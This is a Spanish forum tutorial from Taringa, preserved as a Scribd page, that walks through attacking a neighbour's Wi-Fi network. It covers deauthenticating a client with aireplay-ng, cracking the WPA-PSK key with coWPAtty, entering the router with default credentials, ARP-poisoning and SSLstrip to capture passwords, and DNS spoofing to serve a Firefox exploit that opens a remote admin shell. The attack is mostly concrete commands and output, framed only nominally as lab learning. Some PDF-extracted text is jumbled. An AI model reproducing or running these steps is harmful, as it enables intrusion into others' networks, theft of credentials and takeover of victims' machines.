P. 1
Modelo de Ataque Crackeo y Hackeo - Taringa!

Modelo de Ataque Crackeo y Hackeo - Taringa!

|Views: 572|Likes:
Publicado porOriol Fuertes

More info:

Published by: Oriol Fuertes on May 23, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

05/23/2012

pdf

text

original

Modelo de ataque crackeo y hackeo - Taringa!

http://www.taringa.net/posts/linux/5957107.R/Modelo-de-ataque-crack...

Uri44

Buscar...

Posts
Inicio

Comunidades
Destacados

Música

TOPs
Historial

Global

Novatos

Crear post

El post que buscas se encuentra eliminado, pero este también te puede interesar LINUX Y GNU | HACE MÁS DE 1 AÑO
M'agrada 2 0 0 Twittear 0

TheFatal
Seguir

Modelo de ataque crackeo y hackeo
5
Anuncios Google

Seguidores

Cifrado gratis
www.sophos.com/Cifrado_gratis - ¿Busca una herramienta de cifrado? ¡Pruebe nuestro software gratuito! Esta guía/tutorial está hecha con mero carácter de aprendizaje, basada en un tutorial encontrada en otro foro que citaré en el pie del tutorial pero adaptada para que lo pueda entender la mayoría de los interesados, por parte de los lectores y del que lo redacta, siendo desarrollado en un entorno local de laboratorio en el que todo el material es legítimo, ya saben, hay que ser buenos... Mi idea es darle un aspecto lo más práctico posible, no enrollándome demasiado en conceptos teóricos, que sin duda, la gente que de verdad esté interesada, se ocupará de aprender (No sean bagos por favor). Antes de empezar vamos a pasar a comentar un poquito más en detalle los pasos que iremos realizando: – [In]Seguridad Wifi: Como todo el mundo sabe, es común encontrar entre las redes de los vecinos que muchas de estas estén sin encriptación, o que usen WEP, y las menos WPA-PSK. Dado que el nivel medio de los usuarios que usan ordenadores suele ser de perfil medio-bajo-rebajo (ver el correo, el facebook, hablar por el msn, etc...), no se puede esperar gran cosa en cuanto a la seguridad en su router inalámbrico, asi que nos aprovecharemos de ello para sacar la clave y poder conectarnos a su misma red. Una vez conseguido esto, también es ver muy común, que debido a la vagancia/dejadez de los técnicos que instalan la conexión a internet, la contraseña por defecto de los routers permanece, cosa que también aprovecharemos para conectarnos a la configuración, y obtener valiosa información. – Estamos dentro...: Una vez realizado el paso anterior, ya estaremos en el mismo segmento de red que los hosts legítimos conectados al router inalámbrico, por lo que nos aprovecharemos de esto para sniffar tráfico y obtener más datos de las víctimas, como por ejemplo: passwords de todo tipo, información privada, etc... – Rematando el asunto: Para finalizar, después de recopilar toda la información que consideremos necesaria, la usaremos para conseguir acceso de Administrador al host elegido, y hacernos con el control total de este.
Anuncios Google Regular

107 3
Posts

Puntos

Ver más del autor »

Tags
hack aircrack ataque wep

wireshark

Nuevo botón de Taringa!
Con el botón social de Taringa! los usuarios podrán recomendar tu web muy facilmente!

En el tutorial, el flaco hace todos las pruebas con máquinas virtuales. Yo no tengo problema ni dificultad en usarlas, pero debido a un amigo que seguramente leerá el tutorial este, lo voy a adaptar para que se pueda hacer sin necesidad decrear maquinas virtuales ni usarlas :eem: . Cualquier distribución de Linux está permitida para usarla de "intruso", siempre y cuando tengan un 1% de idea del poder que tienen en su computadora. Para la maquina víctima, en este caso, la típica, Guindows XP (la cara no) Las 2 tarjetas inalámbricas: – ipw3945, usada por la víctima para conectarse – smc con chipset atheros y drivers madwifi-ng, usada por el intruso Y por último, todas las herramientas utilizadas comunmente, como Aircrack-ng, WireShark, dsniff, etc... Bueno, empezemos :A Como ya comentamos anteriormente, es común encontrarnos la típica red de los vecinos, sin ningún tipo de seguridad, quizás con Wep, y en el mejor :A de los casos con Wpa/Wpa2. En nuestro caso, vamos a centrarnos en la alternativa más "difícil" que se nos podría presentar, es decir el caso en el que la red esté protegida con Wpa/Wpa2 con PSK (sino no tiene gracia), obviamente hay escenarios más difíciles, como por ejemplo el uso de Wpa/Wpa2 Empresarial (es decir, con el uso de un Servidor Radius), pero como su propio nombre indica, es una alternativa que se usa casi exclusivamente a nivel empresarial, y a veces ni eso, por lo que es altamente improbable que nos encontremos con algo de este tipo. Aunque el diseño de Wpa/Wpa2 aun no ha sido comprometido totalmente (ya veremos cuanto tarda), si que nos podemos aprovechar de sus implementaciones, en este caso el uso de Claves Pre-Compartidas no muy robustas y que hacen que sea el eslabón débil de la cadena. El primer paso, será la identificación del objetivo, así que sin más dilación, vayamos al grano. Para ello, establecemos la conexión de nuestra placa de Wireless en modo monitor, y a continuación con ayuda de airodump-ng empezaremos a ver lo que se cuece por el vecindario! :oki: thefatal@note1:~$ sudo ifconfig wlan0 down

Router WiFi Wireless Network Router Internet WiFi

1 de 9

12/03/2012 10:03

Ahora. y que lo haga indefinidamente (hasta que nosotros lo paremos ). STMAC: [00:13:02:19:12:5B] [ 0| 0 ACKs] 14:10:10 Sending 64 directed DeAuth.Modelo de ataque crackeo y hackeo . pero si alguien está interesado en una explicación más exacta y formal de la “debilidad” de la PSK. tiene el cifrado que andábamos buscando. thefatal@note1:~$ sudo iwconfig wlan0 mode monitor thefatal@note1:~$ sudo airodump-ng wlan0 Una vez ingresado este último comando.taringa.. varias con WEP. proximamente postearé mas información sobre este tipo de cifrado.net/posts/linux/5957107. para que tenga que volver a autenticarse. A continuación. simplemente preguntenle al tio Google Prosigamos. será conseguir que el cliente conectado se caiga. una de ellas sin ningún tipo de protección. Para los que son impasientes. nos tendría que cambiar a algo así . nosotros vamos a centrarnos en la red con Essid “Casa_Antonio”. la consola se limpiará y aparecera algo así (voy a usar las imagenes del tutorial. STMAC: [00:13:02:19:12:5B] [ 0| 0 ACKs] 14:10:08 Sending 64 directed DeAuth. 2 de 9 12/03/2012 10:03 .R/Modelo-de-ataque-crack. y en ese momento capturar el 4-way handshake. STMAC: [00:13:02:19:12:5B] [ 0| 0 ACKs] … Donde le indicamos que realice un ataque de desautenticación. en una nueva terminal obligaremos al cliente legítimo a re-autenticarse para poder capturar el handshake: thefatal@note1:~$ sudo aireplay-ng -0 0 -a 00:1A:2B:42:9A:9A -c 00:13:02:19:12:5B wlan0 14:10:06 Waiting for beacon frame (BSSID: 00:1A:2B:42:9A:9A) on channel 2 14:10:07 Sending 64 directed DeAuth. despues si alguien no entiende pregunte o pida qe voy a poner imagenes tomadas por mí) Como vemos en la imagen. contra el cliente -c. mediante fuerza bruta. junto con sus vulnerabilidades y demás. conectado al AP -a. que como vemos. pueden encontrar información en otros foros. hay bastante redes. vamos a filtrar un poquito el asunto.Taringa! http://www.. y el resto con WPA-PSK. Ahora. el objetivo de esta guía es centrarnos en la parte práctica. sacar la PSK y poder conectarnos como si fuésemos un cliente legítimo. que usaremos para. volviendo a la otra terminal. Como comenté al principio. limitándonos a capturar paquetes del canal en el que se encuentra la red citada: thefatal@note1:~$ sudo airodump-ng -c 2 -bssid 00:1A:2B:42:9A:9A -w vecinos wlan0 Ahora me detendré un momento para explicar el comando recien ingresado: -c = Lo que hace es obligar al comando a utilizar el canal de Wireless 2 -bssid = Lo que hace es obligar al comando a capturar paquetes de esta estación -w = Escribe los datos obtenidos al archivo "vecinos" El siguiente paso.

Estas tablas están basadas en la teoría de cambio de tiempo por espacio. trataremos de acceder a la configuración del router. 3 de 9 12/03/2012 10:03 .72. usamos un diccionario del sistema.taringa.255. 01 Jan 2000 02:06:21 GMT Content-Type: text/html Connection: close <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4> No request found. pero a esto de la fuerza bruta./cowpatty -r ~/Escritorio/guia_elhacker capturaswifi/*. Los routers inalámbricos suelen tenes un mini servidor http que provee acceso a la configuración a través del puerto 80.130 Difusión: 172.72.16. asi que ya hemos conseguido nuestro primer objetivo! :oki: Una vez que nos conectamos a la red./genpmk f /etc/dictionaries-ommon/words -d hash_file -s "Casa_Antonio" Como vemos. mapear puertos para hacer scans de puertos a los host conectados.Modelo de ataque crackeo y hackeo .3$ .255 Máscara:255. para cerciorarnos de esto: thefatal@note1:~$ ifconfig wlan0 ath0 Link encap:Ethernet direcciónHW 00:13:f7:3b:b4:e0 inet dirección:172. estaría bien usarlas para esta guía. que se usa para precomputar los archivos hash de forma similar a como se hace en las Rainbow Tables.R/Modelo-de-ataque-crack. Si quereis más información sobre las Rainbow Tables podéis echarle un vistazo a: – http://www.3$ . como IP de los hosts conectados.. Una vez generado el hash file lo podemos usar contra cualquier red cuyo SSID sea “Casa_Antonio”.wikipedia. pero antes de esto.2 80 HTTP/1. pero debido a que son más de 30 Gb y además no accesibles (al menos no las he encontrado) desde descarga directa alargaría mucho su descarga – La utilidad trae un programa llamado genpmk. y que es la herramienta que en conjunción con coWPAtty vamos a usar.72.255.0 . el siguiente paso podría ser ponernos directamente a sniffar tráfico. en nuestro caso “Casa_Antonio”: thefatal@note1:~/Escritorio/cowpatty-4. y al rato se vuelve a conectar.net/gonalvmar/rainbow-tables – http://en. y procedemos a ello: thefatal@note1:~/Escritorio/cowpatty-4.slideshare.net/posts/linux/5957107. etc. thefatal@note1:~$ nc 172. es una programa del tipo aircrack pero que añade 2 funcionalidades muy interesantes: – La primera es el uso en sí de las Rainbow Tables.. y que la salida se hará al archivo hash_file.org/wiki/Rainbow_table Para este ataque voy a usar coWPAtty.. El primer paso será generar los hash files para un SSID en específico.cap -d hash_file -s "Casa_Antonio" A continuación vemos la salida del programa: Voilà! Ya tenemos la PSK. ya que si conseguimos acceso podremos recopilar información relevante. Estas son un tipo de tablas de búsqueda especiales que permiten recuperar passwords usando los hashes de estos.16. el cliente se cae. Como observamos en la ventana del airodump.16... le podemos añadir un toque elegante: Rainbow Tables.Taringa! http://www..1 400 Bad Request Server: micro_httpd Cache-Control: no-cache Date: Sat. momento en el que ya tenemos lo que queríamos! El último paso será conseguir la PSK mediante fuerza bruta.

pero a continuación nos muestra el modelo del router. el mapeo de puertos. y la máscara.com /archive/1/499503 Donde se informa de varias vulnerabilidades en este servidor. como las tablas NAT..2.acme. Así que ahora ya mediante nuestro navegador favorito.Admin correspone al User. la sección de Wireless. ya que no suelen ser cambiadas ni por los usuarios ni por los “técnicos” que hacen la instalación. Seguridad. Y en pantalla vemos como hay 2 clientes conectados. la configuración Wireless.Taringa! http://www. donde podemos destacar cosas que nos podrían ser de gran utilidad. – La opción “vaga” es.R/Modelo-de-ataque-crack. En primer lugar nos devuelve un error 400.taringa. nos vamos a la pestaña Sniff-> Unified Sniffing. el legítimo.. buscar por internet las contraseñas por defecto.. A continuación escaneamos todos los hosts que haya conectados. basta con buscar un poco en google y obtenemos por ejemplo esto: http://www. ya que sabemos el modelo concreto del router. Obteniendo el siguiente resultado: 4 de 9 12/03/2012 10:03 . Su funcionamiento es muy simple.Pass por defecto. etc.. Filtrado MAC..net/posts/linux/5957107. y más en concreto en la implementación que corre sobre nuestro router.. Dicha búsqueda nos indica que: Admin. y nosotros. es que en este tipo de router no muestra las Ip's de los hosts conectados.securityfocus.Modelo de ataque crackeo y hackeo . Aquí vemos la pantalla principal de configuración. y seleccionamos el interfaz adecuado. así que sólo tendríamos que leer un poquito y aplicar el exploit correspondiente para acceder. Un poquito más en detalle. donde vemos que podemos tocar toda la configuración: Nombre de la red. y tratar de explotarla para conseguir acceso.com/software/micro_httpd/">micro_httpd</A> </ADDRESS> </BODY></HTML> Lo primero que hemos hecho es averiguar que Ip se nos ha asignado. Una vez que sabemos que es la 172. y los listamos (pestaña Host). para así saber cual es la puerta de enlace. Ahora tenemos 2 opciones: – Buscar una vulnerabilidad en el Servidor micro_httpd. así como el mini servidor Web que comentamos anteriormente (micro_httpd). Esto no es muy difícil.16. nos conectamos a la Ip indicada anteriormente. no va a resultar ser ningún problema.72.Admin y.. COMTREND CT-536/HG-536+ <HR> <ADDRESS> <A HREF="http://www. nos conectamos al puerto 80 con ayuda de netcat y vemos que nos ha “escupido” información que nos puede ser útil... introducimos la tupla Admin. El único “detalle” a comentar. pero esto como veremos. Para sacar la Ip del host conectado nos ayudaremos de Ettercap.

Y finalmente la última dirección la usa vmware.16. Para ver los resultados basta con hacer un: thefatal@note1:~$ sudo tail -f captura_sslstrip 5 de 9 12/03/2012 10:03 . una magnífica herramienta que se sirve de la poca atención de los usuarios en su navegación. pero sin embargo el tráfico con la víctima va en texto plano (HTTP). de forma que se conecta con el servidor mediante HTTPS.py -w captura_sslstrip -s -l 5555 -k -f Consiguiendo que se guarde sólo el tráfico SSL en el archivo captura_sslstrip. y una vez tenemos SslStrip en nuestra máquina y seguimos las instrucciones de se README.16. Así que ya tenemos lo que queríamos: – Router: 172. como cuando navegamos por la página de nuestro Banco. Con todo lo anterior.72.72.2 como puerta de enlace.R/Modelo-de-ataque-crack. La 3era entrada corresponde al host legítimo (nuestra víctima).131 El siguiente paso será mediante arpspoofing hacernos pasar por el router y hacer un MiM (Men In Middle) para capturar todo el tráfico que pase desde la víctima hasta el router y viceversa.16..Modelo de ataque crackeo y hackeo .72. Esto con Ettercap es sencillo. Finalmente hacemos el arp poisonning (Mitm → Arp Poisonning).2 – Víctima: 172.as. para ello usaremos SslStrip... observaremos que se puede leer en claro la información que no va cifrada.. pero también observamos que habrá tráfico cifrado (TLS. simplemente nos ponemos encima de la Ip del router y lo añadimos a la lista de “víctimas” pulsando el 1. en cuanto la víctima se conecte a alguna página que use HTTP sobre tls/ssl podremos capturar todo como si fuese texto plano. y empezamos a capturar paquetes (Ettercap → Start Sniffing) Si ahora abrimos el wireshark y empezamos a capturar tráfico..Taringa! http://www.131). que aunque vemos.com Si seguimos capturando tráfico.addr == 172.72.. y a continuación añadimos a la víctima pulsando el 2.16. Las 2 primeras entradas corresponden a interfaces creadas por vmware (no le den bola. Vamos a tratar de remediar esto.net/posts/linux/5957107. filtrando sólo el tráfico de la Ip víctima (ip. lo único que deberemos de hacer será: thefatal@note1:~$ sudo python sslstrip.taringa. Yo al principio dije que el que creó este tutorial usaba VM) a modo de router de la red virtual. incluso cuando son cosas de alto valor. veremos el tráfico que genera: En la imagen podemos ver el filtro que hemos aplicado. SSL v2). en nuestro caso vamos a trabajar con la 172. no tiene sentido aparente. Ahora. matamos las conexiones existentes y usamos el icono del candadito. escuchando las conexiones en el puerto 5555. por ejemplo user y pass de conexiones a FTP. y cómo la víctima ha entrado en la página Web http://www. Lo que hace es hacer un MiM entre el Servidor de turno y la víctima.

Otra opción sería por ejemplo usar un proxy y cambiar la página que pide la víctima por la nuestra. lo lógico sería mediante nmap scanear el host. Para realizar el DNS spoofing con ettercap.. o de una forma más gráfica con el wireshark: Como vemos. continuemos.milw0rm. hay infinidad de formas de actuar! Exploits originales: – http://www. el último pasito será hacernos con el control total del ordenador de la víctima.. siempre os podeis ayudar de metasploit y su página web.130 Donde le indicamos que mediante una entrada tipo A de DNS (traducción de nombre de dominio a dirección Ip). en busca de servicios activos y vulnerables. Lo que nosotros haremos será usar el código del primer exploit. Y efectivamente hemos tenido suerte! Así que manos a la obra. 6 de 9 12/03/2012 10:03 . en este caso hemos capturado el proceso de autenticación a una cuenta de correo. con ayuda de wireshark vamos a analizar las cabeceras de las peticiones Webs en busca de saber que navegador usa la víctima y ver si hay suerte.. pero.5 del navegador Web Firefox. tenemos 2 exploits.Taringa! http://www. nos ayudaremos de nuevo del ettercap para hacer un DNS poisoning y redireccionar por ejemplo la página de google a nuestro exploit.net que hay una vulnerabilidad en versión 3.. echarle imaginación.com/exploits/9181 Lo único que tenemos que hacer es cambiar la shellcode del segundo por el del primero. echarle imaginación. asi que suponiendo que lo tenemos ya corriendo en nuestra máquina y el exploit debidamente colocado. :d No voy a pararme en explicar como instalar el Apache ya que no es el cometido de este artículo. Para acabar..16.72.. y esperar a que pique el anzuelo.. hemos leido en el foro de elhacker.. que es como un sastre a medida. el primero es una POC en la que sólo hace saltar la calculadora.net/posts/linux/5957107. Una vez que hemos robado toda la información que consideremos oportuna.taringa. en fin.Modelo de ataque crackeo y hackeo . lo primero será modificar el archivo de configuración de nuestro “DNS local”.. Una vez que tenemos el exploit. Como vemos.... nos montaremos un Apache en nuestro ordenador (lo que he hecho yo). esto es sólo la puntita del iceberg.R/Modelo-de-ataque-crack.com/exploits/9247 – http://www.dns Y dejaremos únicamente esto: *. pero el segundo está codificado en python y crea una conexión al puerto 5500 donde nos podremos conectar remotamente con privilegios de administrador..* A 172. ubicado en: /usr/share /ettercap/etter. Así que vamos a probar suerte.. Ahora sólo queda esperar a que la víctima intente ir a google y. como somos expertos en seguridad y estamos al día de los últimos bugs.milw0rm.. o podemos subirlo a algún servicio de hosting gratuito. Si buscamos en milw0rm.... esto es sólo la puntita del iceberg.google.. en este caso hemos capturado el proceso de autenticación a una cuenta de correo. Los pasos típicos son los siguientes: – Recopilar información sobre los servicios/programas que usa la víctima – Centrarnos en uno e intentar buscar una vulnerabilidad conocida – Explotarla y hacernos con el control total En la posición en la que nos encontramos. Puede que esto no haga falta. pero modificando el shellcode por el del segundo.. nos redirija al Servidor Web ubicado en nuestro host! El siguiente paso será irnos en ettercap a la pestaña Plugins-> Manage the Plugins y activamos dns_spoof. si quereis otro tipos de payloads. y la vulnerabilidad va de la manita de un par de exploits publicados en milw0rm.

como siempre... na.net/posts/linux/5957107.R/Modelo-de-ataque-crack. Esta sería una captura en la que vemos cómo nos conectamos desde nuestro host al puerto que nos ha habilitado el exploit en la víctima..beini 1. cuando en realidad corrió el exploit. jaja. cualquier duda. Y finalmente vemos como podemos navegar a nuestro antojo por el sistema. mentira. ya que sino me meten en cana.2.2 7 de 9 12/03/2012 10:03 .659 Visitas 2 Seguidores Relacionados Hackear contraseña Wep con commview for wifi 6. Creado por :: Antonio Sánchez Camacho y modificado por TheFatal 2 Me gusta 0 0 0 Twittear Dar puntos 1 2 42 Puntos T! score: 6 / 10 Seguir A favoritos 30 Favoritos 8...3 y aircrack Hack clave WEP .taringa. la responderé apenas pueda..Modelo de ataque crackeo y hackeo . antes y después de acceder supuestamente a google. Esta sería una vista de las conexiones en el host víctima.Taringa! http://www. somos administradores!!! → CONTROL TOTAL Espero qe les sirva meramente de forma de aprendizaje.

.. Consigue tu solución en Landashop! www. Wimax resp.taringa.R/Modelo-de-ataque-crack.com 11 comentarios @TheFatal hace 1 año No sé ustedes. le erraste en el link de las imagenes. @Golden_Soldier hace 1 año +10 @mirianpaz hace 3 meses Grosísimo.centralitadetelefonica. @kookkk hace 1 año gracias por el mensaje te dejo +5. tenes que poner este: @TheFatal hace 1 año Ya me parecía.. fijate si podés mandarme el código así modifico el post @Kavaraki hace 1 año @kookkk hace 1 año no se ven las imagenes. www.landashop. jaja Igual no lo veo. aun asi lo estuve leyendo y me parecio muy interesante.net/posts/linux/5957107. Switches. obtener wep con aircrack ( ubuntu ) sin cliente conectados Ubuntu 11. ADSL.com Cobertura Wifi y DECT Estudios de cobertura certificados Wireless. eres uno de los míos @mirianpaz hace 3 meses Justo lo que buscaba! @leandrugs hace 3 meses ah bue. la historia se repite Anuncios Google Router WiFi Internet WiFi Wireless WiFi ADSL WiFi Router 8 de 9 12/03/2012 10:03 . Cámaras.Taringa! http://www... pero a mí no me deja ver mis propias imagenes @marabunta hace 1 año vamos PELUCHIN @masterl1nk hace 1 año Buena Guido jajajajaj cuando lo vi supe que eras vos. arregla las imagenes o te recomiendo que crees un video donde realices estos pasos 1 por 1 para entenderlos mejor.PLC.. 24 h. DECT.Modelo de ataque crackeo y hackeo .04 (eth1 a wlan0) solucion al aircrack wifi gratis Atheros AR5B97 Aircrack Fixed Channel -1 Solución Como hackear una red wifi con aircrack en ubuntu Descargar CommView for WiFi + aircrack Como hackear una WEP (avanzado) TP-Link en Landashop WiFi. cuando s¡lo arrgegles o hagas un video me mandas un mp..

...taringa.R/Modelo-de-ataque-crack.. Buscar.Taringa! http://www.Modelo de ataque crackeo y hackeo . Ir al cielo Anunciar Ayuda Prensa Protocolo Desarrolladores Denuncias Report Abuse .net/posts/linux/5957107.DMCA Términos y condiciones Privacidad de datos 9 de 9 12/03/2012 10:03 .

You're Reading a Free Preview

Descarga
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->